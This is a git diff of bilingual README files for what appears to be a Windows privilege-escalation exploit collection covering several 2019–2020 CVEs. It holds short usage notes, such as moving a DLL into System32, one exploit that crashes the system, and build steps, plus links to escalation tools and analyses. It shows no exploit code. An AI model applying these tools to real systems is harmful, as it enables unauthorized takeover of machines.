Test system Windows 7 SP1 x64 ,Direct GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://github.com/piotrflorczyk/cve-2019-1458_POC
|
||||
|
||||
@@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
|
||||
|
||||
该EXP是使用提权进行文件迁移操作,如果想使用cmd需要自己修改代码,测试机器Windows 10 1709 X64,动图中是把**test.dll**移动到 `C:\Windows\System32`目录下,**test.dll**可以是任意文件。使用exe时需要把**NtApiDotNet.dll**文件放到同级目录
|
||||
|
||||
|
||||
|
||||
|
||||
> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.
|
||||
|
||||
|
||||
@@ -42,7 +42,7 @@ CompilerEnvironment
|
||||
|
||||
The exp is a file migration operation using rights, if you want to use CMD, you need to modify the code, test the machine Windows 10 1709 x64,The moving map is moved to the `C:\Windows\System32` directory, **Test.dll** can be any file. Put the **ntapidotNet.dll** file in the same level when using EXE
|
||||
|
||||
|
||||
|
||||
|
||||
> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.
|
||||
|
||||
|
||||
@@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683
|
||||
|
||||
测试机器Windows 10 1909 X64,源码中只对指定文件进行写入信息,如果需要获取某项程序的权限,需要自行修改源码
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- [MSI_EoP_New.pdf](./MSI_EoP_New.pdf)
|
||||
|
||||
@@ -42,7 +42,7 @@ CompilerEnvironment
|
||||
|
||||
Test Machine Windows 10 1909 x64, only written information on the specified file in the source code, if you need to get the permissions of a program, you need to modify the source code yourself.
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
|
||||
|
||||
@@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe
|
||||
|
||||
测试系统Windows 7 SP1 x64,直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://f5.pm/go-28382.html
|
||||
|
||||
@@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe
|
||||
|
||||
Test system Windows 7 SP1 x64,Direct GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://f5.pm/go-28382.html
|
||||
|
||||
@@ -39,11 +39,11 @@ ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4
|
||||
Get-FileHash -Path c:/windows/system32/drivers/srv2.sys
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
然后就直接上GIF图了
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://paper.seebug.org/1168/
|
||||
|
||||
@@ -40,11 +40,11 @@ View MD5 value
|
||||
Get-FileHash -Path c:/windows/system32/drivers/srv2.sys
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Then directly gif map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://paper.seebug.org/1168/
|
||||
|
||||
@@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015
|
||||
|
||||
测试机器Windows 10 1909 X64,会使CPU跑满导致蓝屏
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html
|
||||
|
||||
@@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015
|
||||
|
||||
Test Machine Windows 10 1909 x64, will make CPUs to lead blue screen
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html
|
||||
|
||||
@@ -53,7 +53,7 @@ cargo build --release
|
||||
|
||||
接着直接在Windows 7 SP1 X64下运行即可
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.anquanke.com/post/id/209329
|
||||
|
||||
@@ -53,7 +53,7 @@ There are two points here to pay attention:
|
||||
|
||||
Then run directly in Windows 7 SP1 X64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.anquanke.com/post/id/209329
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user